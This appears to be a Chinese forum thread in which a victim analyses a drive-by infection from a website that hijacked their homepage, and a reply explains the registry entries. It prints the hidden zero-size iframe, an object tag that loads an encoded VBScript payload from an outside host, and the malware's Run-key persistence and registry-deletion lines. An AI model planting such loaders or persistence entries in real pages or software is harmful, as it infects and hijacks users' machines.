www.qq730.com
这个网站不地道,上了之后修改了我的默认主页,因为我以前中过类似的招.所以这次清除基本上比较顺利,首先它在主页的源文件中嵌了一个隐藏的东东
1<iframe frameborder="0" height="0" scrolling="NO" src="haohz.htm" width="0"></iframe>
这个haohz.htm的原码是
1<html>
2<object data="http://www.mmqm.com/haohz.test">
3</object>
4</html>
而这个haohz.test是个加了密的"VBScript.Encode",问题一:这种加密文件目前可以破戒出原码么?VBScript.Encode的机理是怎样的?在它被调用时如何还原?请各路高手指教.
这个病毒代码一旦运行,会生成c:$NtUninstallQ8875736$\WINSYS.***
且会向注册表内的HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
等处写值,修改主页以及使开机时运行c:$NtUninstallQ8875736$\WINSYS.vbs
问题2:那个winsys中有一段我看不懂,望各路高手指教...
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"LogFeil"="regedit -s C:\$NtUninstallQ8875736$\\WINSYS.cer"
"internat.exe"="internat.exe"
"zwupdows"=-
"win"=-
"mwin"=-
"intenet"=-
"Inernet"=-
"Internet"=-
"iexpleror"=-
"zxdows"=-
"qwe"=-
"win1"=-
"winwin"=-
"9i5zxdows"=-
"9i5com01zxdows"=-
"99zxdows"=-
"syste"=-
"intelnat.exe"=-
"88zxdows"=-
"Start Pagewin"=-
"Start Page"=-
"9i5comzxdows"=-
"9q5zxdows"=-
"999izxdows"=-
"033zxdows"=-
"8zxdows"=-
"flash"=-
"3zxdows"=-
"interneet.exe"=-
"u88y"=-
"88u88"=-
"u18"=-
"u1881"=-
"u1882"=-
"u1883"=-
"u1884"=-
"u1885"=-
"u1886"=-
"u1887"=-
"u1888"=-
"system"=-
"u188"=-
"iexpler"=-
"u1810"=-
"WIN32"=-
"W1N32"=-
"Abank"=-
"Ziplog"=-
"SystemServices"=-
"stup"=-
"Services"=-
"WJQ32"=-
"syslog"=-
这段代码的用处是....???
---------------------------------------------------------------
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]这是指所要修改的注册报项
"LogFeil"="regedit -s C:\$NtUninstallQ8875736$\\WINSYS.cer"这是将WINSYS.CER这个文件中的东西添加到注册报中,你可以打开WINSYS.CER这个文件看看
"internat.exe"="internat.exe"这是建立一个字符串“internat.exe”,其值是“internat.exe”,这两个看上去相同,但实质不同,前者只是名称,后者是文件名
"zwupdows"=-此行以下包括此行的意思就是如果当前注册表项中存在“=”前面的名称,则删除